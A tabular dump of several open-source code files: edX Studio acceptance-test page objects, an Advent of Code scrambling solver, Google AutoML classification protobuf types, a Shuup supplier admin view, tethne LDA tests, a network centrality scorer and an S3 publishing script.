repo_name (string, 5-92 chars) | path (string, 4-232 chars) | copies (string, 19 classes) | size (string, 4-7 chars) | content (string, 721-1.04M chars) | license (string, 15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51-99.9) | line_max (int64, 15-997) | alpha_frac (float64, 0.25-0.97) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
nttks/edx-platform | common/test/acceptance/pages/studio/library.py | 1 | 11569 | """
Library edit page in Studio
"""
from bok_choy.javascript import js_defined, wait_for_js
from bok_choy.page_object import PageObject
from bok_choy.promise import EmptyPromise
from selenium.webdriver.support.select import Select
from .component_editor import ComponentEditorView
from .container import XBlockWrapper
from ...pages.studio.users import UsersPageMixin
from ...pages.studio.pagination import PaginatedMixin
from selenium.webdriver.common.keys import Keys
from ..common.utils import confirm_prompt, wait_for_notification
from . import BASE_URL
class LibraryPage(PageObject):
"""
Base page for Library pages. Defaults URL to the edit page.
"""
def __init__(self, browser, locator, course_locator):
super(LibraryPage, self).__init__(browser)
self.locator = locator
self.course_locator = course_locator
@property
def url(self):
"""
URL to the library edit page for the given library.
"""
return "{}/course/{}/library/{}".format(BASE_URL, unicode(self.course_locator), unicode(self.locator))
def is_browser_on_page(self):
"""
Returns True iff the browser has loaded the library edit page.
"""
return self.q(css='body.view-library').present
class LibraryEditPage(LibraryPage, PaginatedMixin, UsersPageMixin):
"""
Library edit page in Studio
"""
def get_header_title(self):
"""
The text of the main heading (H1) visible on the page.
"""
return self.q(css='h1.page-header-title').text
def wait_until_ready(self):
"""
When the page first loads, there is a loading indicator and most
functionality is not yet available. This waits for that loading to
finish.
Always call this before using the page. It also disables animations
for improved test reliability.
"""
self.wait_for_ajax()
super(LibraryEditPage, self).wait_until_ready()
@property
def xblocks(self):
"""
Return a list of xblocks loaded on the container page.
"""
return self._get_xblocks()
def are_previews_showing(self):
"""
Determines whether or not previews are showing for XBlocks
"""
return all([not xblock.is_placeholder() for xblock in self.xblocks])
def toggle_previews(self):
"""
Clicks the preview toggling button and waits for the previews to appear or disappear.
"""
toggle = not self.are_previews_showing()
self.q(css='.toggle-preview-button').click()
EmptyPromise(
lambda: self.are_previews_showing() == toggle,
'Preview is visible: %s' % toggle,
timeout=30
).fulfill()
self.wait_until_ready()
def click_duplicate_button(self, xblock_id):
"""
Click on the duplicate button for the given XBlock
"""
self._action_btn_for_xblock_id(xblock_id, "duplicate").click()
wait_for_notification(self)
self.wait_for_ajax()
def click_delete_button(self, xblock_id, confirm=True):
"""
Click on the delete button for the given XBlock
"""
self._action_btn_for_xblock_id(xblock_id, "delete").click()
if confirm:
confirm_prompt(self) # this will also wait_for_notification()
self.wait_for_ajax()
def _get_xblocks(self):
"""
Create an XBlockWrapper for each XBlock div found on the page.
"""
prefix = '.wrapper-xblock.level-page '
return self.q(css=prefix + XBlockWrapper.BODY_SELECTOR).map(
lambda el: XBlockWrapper(self.browser, el.get_attribute('data-locator'))
).results
def _div_for_xblock_id(self, xblock_id):
"""
Given an XBlock's usage locator as a string, return the WebElement for
that block's wrapper div.
"""
return self.q(css='.wrapper-xblock.level-page .studio-xblock-wrapper').filter(
lambda el: el.get_attribute('data-locator') == xblock_id
)
def _action_btn_for_xblock_id(self, xblock_id, action):
"""
Given an XBlock's usage locator as a string, return one of its action
buttons.
action is 'edit', 'duplicate', or 'delete'
"""
return self._div_for_xblock_id(xblock_id)[0].find_element_by_css_selector(
'.header-actions .{action}-button.action-button'.format(action=action)
)
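# Illustrative sketch (not part of the original suite): a bok-choy acceptance test would
# typically drive this page object roughly as follows; `browser`, `lib_key` and `course_key`
# are assumed to be supplied by the test fixture.
#
#   page = LibraryEditPage(browser, lib_key, course_key)
#   page.visit()
#   page.wait_until_ready()
#   if not page.are_previews_showing():
#       page.toggle_previews()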
class StudioLibraryContentEditor(ComponentEditorView):
"""
Library Content XBlock Modal edit window
"""
# Labels used to identify the fields on the edit modal:
LIBRARY_LABEL = "Library"
COUNT_LABEL = "Count"
SCORED_LABEL = "Scored"
PROBLEM_TYPE_LABEL = "Problem Type"
@property
def library_name(self):
""" Gets name of library """
return self.get_selected_option_text(self.LIBRARY_LABEL)
@library_name.setter
def library_name(self, library_name):
"""
Select a library from the library select box
"""
self.set_select_value(self.LIBRARY_LABEL, library_name)
EmptyPromise(lambda: self.library_name == library_name, "library_name is updated in modal.").fulfill()
@property
def count(self):
"""
Gets value of children count input
"""
return int(self.get_setting_element(self.COUNT_LABEL).get_attribute('value'))
@count.setter
def count(self, count):
"""
Sets value of children count input
"""
count_text = self.get_setting_element(self.COUNT_LABEL)
count_text.send_keys(Keys.CONTROL, "a")
count_text.send_keys(Keys.BACK_SPACE)
count_text.send_keys(count)
EmptyPromise(lambda: self.count == count, "count is updated in modal.").fulfill()
@property
def scored(self):
"""
Gets value of scored select
"""
value = self.get_selected_option_text(self.SCORED_LABEL)
if value == 'True':
return True
elif value == 'False':
return False
raise ValueError("Unknown value {value} set for {label}".format(value=value, label=self.SCORED_LABEL))
@scored.setter
def scored(self, scored):
"""
Sets value of scored select
"""
self.set_select_value(self.SCORED_LABEL, str(scored))
EmptyPromise(lambda: self.scored == scored, "scored is updated in modal.").fulfill()
@property
def capa_type(self):
"""
Gets value of CAPA type select
"""
return self.get_setting_element(self.PROBLEM_TYPE_LABEL).get_attribute('value')
@capa_type.setter
def capa_type(self, value):
"""
Sets value of CAPA type select
"""
self.set_select_value(self.PROBLEM_TYPE_LABEL, value)
EmptyPromise(lambda: self.capa_type == value, "problem type is updated in modal.").fulfill()
def set_select_value(self, label, value):
"""
Sets the select with given label (display name) to the specified value
"""
elem = self.get_setting_element(label)
select = Select(elem)
select.select_by_value(value)
@js_defined('window.LibraryContentAuthorView')
class StudioLibraryContainerXBlockWrapper(XBlockWrapper):
"""
Wraps :class:`.container.XBlockWrapper` for use with LibraryContent blocks
"""
url = None
def is_browser_on_page(self):
"""
Returns true iff the library content area has been loaded
"""
return self.q(css='article.content-primary').visible
def is_finished_loading(self):
"""
Returns true iff the Loading indicator is not visible
"""
return not self.q(css='div.ui-loading').visible
@classmethod
def from_xblock_wrapper(cls, xblock_wrapper):
"""
Factory method: creates :class:`.StudioLibraryContainerXBlockWrapper` from :class:`.container.XBlockWrapper`
"""
return cls(xblock_wrapper.browser, xblock_wrapper.locator)
def get_body_paragraphs(self):
"""
Gets library content body paragraphs
"""
return self.q(css=self._bounded_selector(".xblock-message-area p"))
@wait_for_js # Wait for the fragment.initialize_js('LibraryContentAuthorView') call to finish
def refresh_children(self):
"""
Click "Update now..." button
"""
btn_selector = self._bounded_selector(".library-update-btn")
self.wait_for_element_presence(btn_selector, 'Update now button is present.')
self.q(css=btn_selector).first.click()
# This causes a reload (see cms/static/xmodule_js/public/js/library_content_edit.js)
# Check that the ajax request that caused the reload is done.
# TODO self.wait_for_ajax()
# Then check that we are still on the right page.
self.wait_for(lambda: self.is_browser_on_page(), 'StudioLibraryContainerXBlockWrapper has reloaded.')
# Wait longer than the default 60 seconds, because this was intermittently failing on jenkins
# with the screenshot showing that the Loading indicator was still visible. See TE-745.
self.wait_for(lambda: self.is_finished_loading(), 'Loading indicator is not visible.', timeout=120)
# And wait to make sure the ajax post has finished.
self.wait_for_ajax()
self.wait_for_element_absence(btn_selector, 'Wait for the XBlock to finish reloading')
class LibraryHomePage(PageObject):
"""
Base page for Library pages. Defaults URL to the home page.
"""
def __init__(self, browser, course_locator):
super(LibraryHomePage, self).__init__(browser)
self.course_locator = course_locator
@property
def url(self):
"""
URL to the library home page for the given library.
"""
return "{}/course/{}/libhome/".format(BASE_URL, unicode(self.course_locator))
def is_browser_on_page(self):
"""
Returns True iff the browser has loaded the library home page.
"""
return self.q(css='.libraries').present
def has_new_library_button(self):
"""
(bool) is the "New Library" button present?
"""
return self.q(css='.new-library-button').present
def click_new_library(self):
"""
Click on the "New Library" button
"""
self.q(css='.new-library-button').first.click()
self.wait_for_ajax()
def is_new_library_form_visible(self):
"""
        Is the new library form visible?
"""
return self.q(css='.wrapper-create-library').visible
def fill_new_library_form(self, display_name, number):
"""
Fill out the form to create a new library.
Must have called click_new_library() first.
"""
field = lambda fn: self.q(css='.wrapper-create-library #new-library-{}'.format(fn))
field('name').fill(display_name)
field('number').fill(number)
def is_new_library_form_valid(self):
"""
        Is the new library form ready to submit?
"""
return (
self.q(css='.wrapper-create-library .new-library-save:not(.is-disabled)').present and
not self.q(css='.wrapper-create-library .wrap-error.is-shown').present
)
def submit_new_library_form(self):
"""
Submit the new library form.
"""
self.q(css='.wrapper-create-library .new-library-save').click()
| agpl-3.0 | 3,979,192,120,614,835,000 | 33.126844 | 116 | 0.622007 | false |
tmct/adventOfCode2016 | problems/21/Solver.py | 1 | 4493 | import re
swap_positions_regex = r'swap position (\d+) with position (\d+)'
swap_letters_regex = r'swap letter (.) with letter (.)'
rotate_regex = r'rotate (left|right) (\d+)'
rotate_on_letter_position_regex = r'rotate based on position of letter (.)'
reverse_slice_regex = r'reverse positions (\d+) through (\d+)'
move_regex = r'move position (\d+) to position (\d+)'
class Solver:
def __init__(self, start_string, decrypt = False):
self.buffer = list(start_string)
self.instructions = []
self.decrypt = decrypt
self.reverse_shift = {int(i): int(j) for i, j in zip('13572460', '76542107')}
def solve(self, input_file_name):
intermediates = [''.join(self.buffer)]
with open(input_file_name, 'r') as input_file:
for line in input_file:
self.add_instruction(line.strip())
if self.decrypt:
self.instructions = self.instructions[::-1]
for instruction in self.instructions:
instruction()
# intermediates.append(''.join(self.buffer))
# if not self.decrypt:
# intermediates = intermediates[::-1]
# for i in intermediates:
# print(i)
return ''.join(self.buffer)
def add_instruction(self, instruction_string):
match = re.search(swap_positions_regex, instruction_string)
if match:
return self.add_swap_positions_instruction(match)
match = re.search(swap_letters_regex, instruction_string)
if match:
return self.add_swap_letters_instruction(match)
match = re.search(rotate_regex, instruction_string)
if match:
return self.add_rotate_instruction(match)
match = re.search(rotate_on_letter_position_regex, instruction_string)
if match:
return self.add_rotate_on_letter_position_instruction(match)
match = re.search(reverse_slice_regex, instruction_string)
if match:
return self.reverse_slice_instruction(match)
match = re.search(move_regex, instruction_string)
if match:
return self.move_instruction(match)
raise Exception('Could not parse line! "{}"'.format(instruction_string))
def add_swap_positions_instruction(self, match):
first, second = (int(group) for group in match.groups())
def swap_positions():
self.buffer[first], self.buffer[second] = self.buffer[second], self.buffer[first]
self.instructions.append(swap_positions)
def add_swap_letters_instruction(self, match):
def swap_letters():
first, second = (self.buffer.index(group) for group in match.groups())
self.buffer[first], self.buffer[second] = self.buffer[second], self.buffer[first]
self.instructions.append(swap_letters)
def add_rotate_instruction(self, match):
steps = int(match.group(2)) % len(self.buffer)
if match.group(1) == 'left':
steps = (len(self.buffer) - steps) % len(self.buffer)
if self.decrypt:
steps = (len(self.buffer) - steps) % len(self.buffer)
def rotate():
self.buffer = self.buffer[-steps:] + self.buffer[:-steps]
self.instructions.append(rotate)
def add_rotate_on_letter_position_instruction(self, match):
def rotate_on_letter_position():
if self.decrypt:
final_index = self.buffer.index(match.group(1)) % 8
steps = self.reverse_shift[final_index]
else:
steps = 1 + self.buffer.index(match.group(1))
if steps >= 5:
steps += 1
steps %= len(self.buffer)
self.buffer = self.buffer[-steps:] + self.buffer[:-steps]
self.instructions.append(rotate_on_letter_position)
def reverse_slice_instruction(self, match):
first, second = (int(group) for group in match.groups())
def reverse_slice():
self.buffer = self.buffer[:first] + self.buffer[first:second + 1][::-1] + self.buffer[second + 1:]
self.instructions.append(reverse_slice)
def move_instruction(self, match):
first, second = (int(group) for group in match.groups())
if self.decrypt:
first, second = second, first
def move():
value = self.buffer[first]
del self.buffer[first]
self.buffer.insert(second, value)
self.instructions.append(move)
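# Usage sketch (added comment, not in the original file): the solver is assumed to be fed a
# text file of scrambling instructions, one per line, as in Advent of Code 2016 day 21. The
# file name and start strings below are hypothetical examples.
#
#   scrambler = Solver('abcdefgh')
#   print(scrambler.solve('input.txt'))            # scrambled password
#   unscrambler = Solver('fbgdceah', decrypt=True)
#   print(unscrambler.solve('input.txt'))          # original password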
| mit | 7,164,240,172,985,285,000 | 38.761062 | 110 | 0.605831 | false |
googleapis/python-automl | google/cloud/automl_v1beta1/types/classification.py | 1 | 13060 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.automl_v1beta1.types import temporal
__protobuf__ = proto.module(
package="google.cloud.automl.v1beta1",
manifest={
"ClassificationType",
"ClassificationAnnotation",
"VideoClassificationAnnotation",
"ClassificationEvaluationMetrics",
},
)
class ClassificationType(proto.Enum):
r"""Type of the classification problem."""
CLASSIFICATION_TYPE_UNSPECIFIED = 0
MULTICLASS = 1
MULTILABEL = 2
class ClassificationAnnotation(proto.Message):
r"""Contains annotation details specific to classification.
Attributes:
score (float):
Output only. A confidence estimate between
0.0 and 1.0. A higher value means greater
confidence that the annotation is positive. If a
user approves an annotation as negative or
positive, the score value remains unchanged. If
a user creates an annotation, the score is 0 for
negative or 1 for positive.
"""
score = proto.Field(proto.FLOAT, number=1,)
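# Added note (not generated code): like any proto-plus message, this annotation can be built
# directly, e.g. ClassificationAnnotation(score=0.9); in practice the score is usually read
# from prediction results rather than set by hand.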
class VideoClassificationAnnotation(proto.Message):
r"""Contains annotation details specific to video classification.
Attributes:
type_ (str):
Output only. Expresses the type of video classification.
Possible values:
- ``segment`` - Classification done on a specified by user
time segment of a video. AnnotationSpec is answered to be
present in that time segment, if it is present in any
part of it. The video ML model evaluations are done only
for this type of classification.
- ``shot``- Shot-level classification. AutoML Video
Intelligence determines the boundaries for each camera
shot in the entire segment of the video that user
specified in the request configuration. AutoML Video
Intelligence then returns labels and their confidence
scores for each detected shot, along with the start and
end time of the shot. WARNING: Model evaluation is not
done for this classification type, the quality of it
depends on training data, but there are no metrics
provided to describe that quality.
- ``1s_interval`` - AutoML Video Intelligence returns
labels and their confidence scores for each second of the
entire segment of the video that user specified in the
request configuration. WARNING: Model evaluation is not
done for this classification type, the quality of it
depends on training data, but there are no metrics
provided to describe that quality.
classification_annotation (google.cloud.automl_v1beta1.types.ClassificationAnnotation):
Output only . The classification details of
this annotation.
time_segment (google.cloud.automl_v1beta1.types.TimeSegment):
Output only . The time segment of the video
to which the annotation applies.
"""
type_ = proto.Field(proto.STRING, number=1,)
classification_annotation = proto.Field(
proto.MESSAGE, number=2, message="ClassificationAnnotation",
)
time_segment = proto.Field(proto.MESSAGE, number=3, message=temporal.TimeSegment,)
class ClassificationEvaluationMetrics(proto.Message):
r"""Model evaluation metrics for classification problems. Note: For
    Video Classification these metrics only describe the quality of the Video
Classification predictions of "segment_classification" type.
Attributes:
au_prc (float):
Output only. The Area Under Precision-Recall
Curve metric. Micro-averaged for the overall
evaluation.
base_au_prc (float):
Output only. The Area Under Precision-Recall
Curve metric based on priors. Micro-averaged for
the overall evaluation. Deprecated.
au_roc (float):
Output only. The Area Under Receiver
Operating Characteristic curve metric. Micro-
averaged for the overall evaluation.
log_loss (float):
Output only. The Log Loss metric.
confidence_metrics_entry (Sequence[google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfidenceMetricsEntry]):
Output only. Metrics for each confidence_threshold in
0.00,0.05,0.10,...,0.95,0.96,0.97,0.98,0.99 and
position_threshold = INT32_MAX_VALUE. ROC and
precision-recall curves, and other aggregated metrics are
derived from them. The confidence metrics entries may also
be supplied for additional values of position_threshold, but
from these no aggregated metrics are computed.
confusion_matrix (google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfusionMatrix):
Output only. Confusion matrix of the
evaluation. Only set for MULTICLASS
classification problems where number of labels
is no more than 10.
Only set for model level evaluation, not for
evaluation per label.
annotation_spec_id (Sequence[str]):
Output only. The annotation spec ids used for
this evaluation.
"""
class ConfidenceMetricsEntry(proto.Message):
r"""Metrics for a single confidence threshold.
Attributes:
confidence_threshold (float):
Output only. Metrics are computed with an
assumption that the model never returns
predictions with score lower than this value.
position_threshold (int):
Output only. Metrics are computed with an assumption that
the model always returns at most this many predictions
(ordered by their score, descendingly), but they all still
need to meet the confidence_threshold.
recall (float):
Output only. Recall (True Positive Rate) for
the given confidence threshold.
precision (float):
Output only. Precision for the given
confidence threshold.
false_positive_rate (float):
Output only. False Positive Rate for the
given confidence threshold.
f1_score (float):
Output only. The harmonic mean of recall and
precision.
recall_at1 (float):
Output only. The Recall (True Positive Rate)
when only considering the label that has the
highest prediction score and not below the
confidence threshold for each example.
precision_at1 (float):
Output only. The precision when only
considering the label that has the highest
prediction score and not below the confidence
threshold for each example.
false_positive_rate_at1 (float):
Output only. The False Positive Rate when
only considering the label that has the highest
prediction score and not below the confidence
threshold for each example.
f1_score_at1 (float):
Output only. The harmonic mean of
[recall_at1][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfidenceMetricsEntry.recall_at1]
and
[precision_at1][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfidenceMetricsEntry.precision_at1].
true_positive_count (int):
Output only. The number of model created
labels that match a ground truth label.
false_positive_count (int):
Output only. The number of model created
labels that do not match a ground truth label.
false_negative_count (int):
Output only. The number of ground truth
labels that are not matched by a model created
label.
true_negative_count (int):
Output only. The number of labels that were
not created by the model, but if they would,
they would not match a ground truth label.
"""
confidence_threshold = proto.Field(proto.FLOAT, number=1,)
position_threshold = proto.Field(proto.INT32, number=14,)
recall = proto.Field(proto.FLOAT, number=2,)
precision = proto.Field(proto.FLOAT, number=3,)
false_positive_rate = proto.Field(proto.FLOAT, number=8,)
f1_score = proto.Field(proto.FLOAT, number=4,)
recall_at1 = proto.Field(proto.FLOAT, number=5,)
precision_at1 = proto.Field(proto.FLOAT, number=6,)
false_positive_rate_at1 = proto.Field(proto.FLOAT, number=9,)
f1_score_at1 = proto.Field(proto.FLOAT, number=7,)
true_positive_count = proto.Field(proto.INT64, number=10,)
false_positive_count = proto.Field(proto.INT64, number=11,)
false_negative_count = proto.Field(proto.INT64, number=12,)
true_negative_count = proto.Field(proto.INT64, number=13,)
class ConfusionMatrix(proto.Message):
r"""Confusion matrix of the model running the classification.
Attributes:
annotation_spec_id (Sequence[str]):
Output only. IDs of the annotation specs used in the
confusion matrix. For Tables CLASSIFICATION
[prediction_type][google.cloud.automl.v1beta1.TablesModelMetadata.prediction_type]
only list of [annotation_spec_display_name-s][] is
populated.
display_name (Sequence[str]):
Output only. Display name of the annotation specs used in
the confusion matrix, as they were at the moment of the
evaluation. For Tables CLASSIFICATION
[prediction_type-s][google.cloud.automl.v1beta1.TablesModelMetadata.prediction_type],
distinct values of the target column at the moment of the
model evaluation are populated here.
row (Sequence[google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfusionMatrix.Row]):
Output only. Rows in the confusion matrix. The number of
rows is equal to the size of ``annotation_spec_id``.
``row[i].example_count[j]`` is the number of examples that
have ground truth of the ``annotation_spec_id[i]`` and are
predicted as ``annotation_spec_id[j]`` by the model being
evaluated.
"""
class Row(proto.Message):
r"""Output only. A row in the confusion matrix.
Attributes:
example_count (Sequence[int]):
Output only. Value of the specific cell in the confusion
matrix. The number of values each row has (i.e. the length
of the row) is equal to the length of the
``annotation_spec_id`` field or, if that one is not
populated, length of the
[display_name][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfusionMatrix.display_name]
field.
"""
example_count = proto.RepeatedField(proto.INT32, number=1,)
annotation_spec_id = proto.RepeatedField(proto.STRING, number=1,)
display_name = proto.RepeatedField(proto.STRING, number=3,)
row = proto.RepeatedField(
proto.MESSAGE,
number=2,
message="ClassificationEvaluationMetrics.ConfusionMatrix.Row",
)
au_prc = proto.Field(proto.FLOAT, number=1,)
base_au_prc = proto.Field(proto.FLOAT, number=2,)
au_roc = proto.Field(proto.FLOAT, number=6,)
log_loss = proto.Field(proto.FLOAT, number=7,)
confidence_metrics_entry = proto.RepeatedField(
proto.MESSAGE, number=3, message=ConfidenceMetricsEntry,
)
confusion_matrix = proto.Field(proto.MESSAGE, number=4, message=ConfusionMatrix,)
annotation_spec_id = proto.RepeatedField(proto.STRING, number=5,)
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | 6,754,684,378,545,079,000 | 46.148014 | 134 | 0.633767 | false |
suutari/shoop | shuup/admin/modules/suppliers/views/edit.py | 1 | 1488 | # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django import forms
from django.utils.translation import ugettext_lazy as _
from shuup.admin.utils.views import (
check_and_raise_if_only_one_allowed, CreateOrUpdateView
)
from shuup.core.models import Supplier
class SupplierForm(forms.ModelForm):
class Meta:
model = Supplier
exclude = ("module_data",)
widgets = {
"module_identifier": forms.Select
}
class SupplierEditView(CreateOrUpdateView):
model = Supplier
form_class = SupplierForm
template_name = "shuup/admin/suppliers/edit.jinja"
context_object_name = "supplier"
def get_object(self, queryset=None):
obj = super(SupplierEditView, self).get_object(queryset)
check_and_raise_if_only_one_allowed("SHUUP_ENABLE_MULTIPLE_SUPPLIERS", obj)
return obj
def get_form(self, form_class=None):
form = super(SupplierEditView, self).get_form(form_class=form_class)
choices = self.model.get_module_choices(
empty_label=(_("No %s module") % self.model._meta.verbose_name)
)
form.fields["module_identifier"].choices = form.fields["module_identifier"].widget.choices = choices
return form
| agpl-3.0 | 8,299,280,317,891,628,000 | 32.066667 | 108 | 0.684812 | false |
diging/tethne | tethne/tests/test_models_lda.py | 1 | 4504 | import sys
sys.path.append('../tethne')
import unittest
import tempfile
import os
from xml.etree import ElementTree as ET
import networkx as nx
import csv
from tethne.model.corpus.mallet import LDAModel
from tethne.readers.wos import read
from tethne import FeatureSet, tokenize
from tethne.networks import topics
datapath = './tethne/tests/data/wos3.txt'
import logging
logger = logging.getLogger('mallet')
logger.setLevel('DEBUG')
class TestLDAModel(unittest.TestCase):
def setUp(self):
corpus = read(datapath, index_by='wosid')
corpus.index_feature('abstract', tokenize, structured=True)
self.model = LDAModel(corpus, featureset_name='abstract')
self.model.fit(Z=20, max_iter=500)
def test_ldamodel(self):
dates, rep = self.model.topic_over_time(1)
self.assertGreater(sum(rep), 0)
self.assertEqual(len(dates), len(rep))
self.assertIsInstance(self.model.phi, FeatureSet)
self.assertIsInstance(self.model.theta, FeatureSet)
self.assertIsInstance(self.model.list_topics(), list)
self.assertGreater(len(self.model.list_topics()), 0)
self.assertIsInstance(self.model.list_topic(0), list)
self.assertGreater(len(self.model.list_topic(0)), 0)
def test_networks(self):
termGraph = topics.terms(self.model)
self.assertGreater(termGraph.size(), 100)
self.assertGreater(termGraph.order(), 10)
topicGraph = topics.cotopics(self.model)
self.assertGreater(topicGraph.size(), 5)
self.assertGreater(topicGraph.order(), 0)
paperGraph = topics.topic_coupling(self.model)
self.assertGreater(paperGraph.size(), 100)
self.assertGreater(paperGraph.order(), 20)
class TestLDAModelUnstructured(unittest.TestCase):
def setUp(self):
corpus = read(datapath, index_by='wosid')
corpus.index_feature('abstract', tokenize)
self.model = LDAModel(corpus, featureset_name='abstract')
self.model.fit(Z=20, max_iter=500)
def test_ldamodel(self):
dates, rep = self.model.topic_over_time(1)
self.assertGreater(sum(rep), 0)
self.assertEqual(len(dates), len(rep))
self.assertIsInstance(self.model.phi, FeatureSet)
self.assertIsInstance(self.model.theta, FeatureSet)
self.assertIsInstance(self.model.list_topics(), list)
self.assertGreater(len(self.model.list_topics()), 0)
self.assertIsInstance(self.model.list_topic(0), list)
self.assertGreater(len(self.model.list_topic(0)), 0)
def test_networks(self):
termGraph = topics.terms(self.model)
self.assertGreater(termGraph.size(), 100)
self.assertGreater(termGraph.order(), 10)
topicGraph = topics.cotopics(self.model)
self.assertGreater(topicGraph.size(), 5)
self.assertGreater(topicGraph.order(), 0)
paperGraph = topics.topic_coupling(self.model)
self.assertGreater(paperGraph.size(), 100)
self.assertGreater(paperGraph.order(), 20)
class TestLDAModelWithTransformation(unittest.TestCase):
def setUp(self):
corpus = read(datapath, index_by='wosid')
corpus.index_feature('abstract', tokenize)
xf = lambda f, c, C, DC: c*3
corpus.features['xf'] = corpus.features['abstract'].transform(xf)
self.model = LDAModel(corpus, featureset_name='xf')
self.model.fit(Z=20, max_iter=500)
def test_ldamodel(self):
dates, rep = self.model.topic_over_time(1)
self.assertGreater(sum(rep), 0)
self.assertEqual(len(dates), len(rep))
self.assertIsInstance(self.model.phi, FeatureSet)
self.assertIsInstance(self.model.theta, FeatureSet)
self.assertIsInstance(self.model.list_topics(), list)
self.assertGreater(len(self.model.list_topics()), 0)
self.assertIsInstance(self.model.list_topic(0), list)
self.assertGreater(len(self.model.list_topic(0)), 0)
def test_networks(self):
termGraph = topics.terms(self.model)
self.assertGreater(termGraph.size(), 100)
self.assertGreater(termGraph.order(), 10)
topicGraph = topics.cotopics(self.model)
self.assertGreater(topicGraph.size(), 5)
self.assertGreater(topicGraph.order(), 0)
paperGraph = topics.topic_coupling(self.model)
self.assertGreater(paperGraph.size(), 100)
self.assertGreater(paperGraph.order(), 20)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 1,083,460,484,099,657,300 | 33.646154 | 73 | 0.672513 | false |
cemarchi/biosphere | Src/BioAnalyzer/Analysis/GenePrioritization/Steps/NetworkAnalysis/NetworkScoreAnalyzers/GeneNetworkScoreAnalyzer.py | 1 | 2431 | import operator
import networkx as nx
from scipy.stats import gmean
from Src.BioAnalyzer.Analysis.GenePrioritization.Steps.NetworkAnalysis.NetworkScoreAnalyzers.NetworkScoreAnalyzerBase \
import NetworkScoreAnalyzerBase
class GeneNetworkScoreAnalyzer(NetworkScoreAnalyzerBase):
def __init__(self):
pass
def calculate(self, network: nx.Graph) -> nx.Graph:
degree_centrality_measure = self.__get_centrality_measure(nx.degree_centrality(network))
page_rank_measure = self.__get_centrality_measure(nx.pagerank(network, alpha=0.85))
betweenness_measure = self.__get_centrality_measure(nx.betweenness_centrality(network))
hubs = None
authorities = None
try:
hubs, authorities = nx.hits(network)
except Exception:
pass
hubs_measure = self.__get_centrality_measure(hubs) if hubs else None
authorities_measure = self.__get_centrality_measure(authorities) if authorities else None
return self.__get_score(network, degree_centrality_measure, page_rank_measure, betweenness_measure,
hubs_measure, authorities_measure)
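    # Small illustrative run (assumption: a toy graph, not project data). Every node ends up
    # with a 'centrality_value' attribute equal to the geometric mean of the centrality
    # scores collected for it:
    #
    #   g = nx.path_graph(4)
    #   scored = GeneNetworkScoreAnalyzer().calculate(g)
    #   print(nx.get_node_attributes(scored, 'centrality_value'))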
def __get_score(self, network, degree_centrality_measure, page_rank_measure, betweenness_measure, hubs_measure,
authorities_measure):
for node in network.node.keys():
score = []
if degree_centrality_measure and node in degree_centrality_measure:
score.append(degree_centrality_measure[node])
if page_rank_measure and node in page_rank_measure:
score.append(page_rank_measure[node])
if betweenness_measure and node in betweenness_measure:
score.append(betweenness_measure[node])
if hubs_measure and node in hubs_measure:
score.append(hubs_measure[node])
if authorities_measure and node in authorities_measure:
score.append(authorities_measure[node])
network.node[node]['centrality_value'] = gmean(score)
return network
def __get_centrality_measure(self, node_measurements):
nodes = sorted(node_measurements.items(), key=operator.itemgetter(1), reverse=True)
measurements = {}
measure = 1
for node, measure in nodes:
measurements[node] = measure
measure += 1
return measurements | bsd-3-clause | -5,332,966,840,455,512,000 | 35.298507 | 119 | 0.654463 | false |
smartystreets/jquery.liveaddress | resources/publish.py | 1 | 2128 | """
This script is used by SmartyStreets when deploying a new version of the jquery.liveaddress plugin.
"""
import os.path as path
import os
import sys
import boto
from boto.s3.bucket import Bucket
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from boto.s3.key import Key
from utils import get_mime_type
def main():
cloudfront_connection = boto.connect_cloudfront()
s3_connection = connect_to_s3()
bucket = Bucket(s3_connection, S3_BUCKET)
publish(bucket, cloudfront_connection)
def connect_to_s3():
"""
Workaround for '.' in bucket names when calling from Python 2.9+:
https://github.com/boto/boto/issues/2836#issuecomment-77283169
"""
if '.' in S3_BUCKET:
return S3Connection(calling_format=OrdinaryCallingFormat())
else:
return S3Connection()
def publish(bucket, cloudfront):
resources = []
for root, dirs, files in os.walk(WORKING_DIRECTORY):
for f in files:
if f not in EXCLUDES:
local_path = path.join(root, f)
resource_path = upload_to_s3(local_path, bucket)
resources.append(resource_path)
distribution = os.environ.get('AWS_CLOUDFRONT_DISTRIBUTION_ID') or raw_input('Enter the cloudfront distribution id: ')
distribution = distribution.strip()
if distribution:
print "Creating cloudfront invalidation for all uploaded resources..."
cloudfront.create_invalidation_request(distribution, resources)
def upload_to_s3(resource, bucket):
entry = Key(bucket)
entry.key = path.join(DESTINATION.format(VERSION), path.basename(resource))
entry.set_metadata('Content-Encoding', 'gzip')
entry.set_metadata('Content-Type', get_mime_type(resource))
print 'Publishing {0} to {1}...'.format(resource, entry.key)
entry.set_contents_from_filename(resource)
return entry.key
EXCLUDES = ['.DS_Store']
DESTINATION = '/jquery.liveaddress/{0}'
WORKING_DIRECTORY = '../workspace/'
S3_BUCKET = 'static.smartystreets.com'
VERSION = '.'.join(sys.argv[1].split('.')[0:2])
if __name__ == '__main__':
main()
| gpl-3.0 | 8,783,965,952,323,402,000 | 29.84058 | 122 | 0.681391 | false |
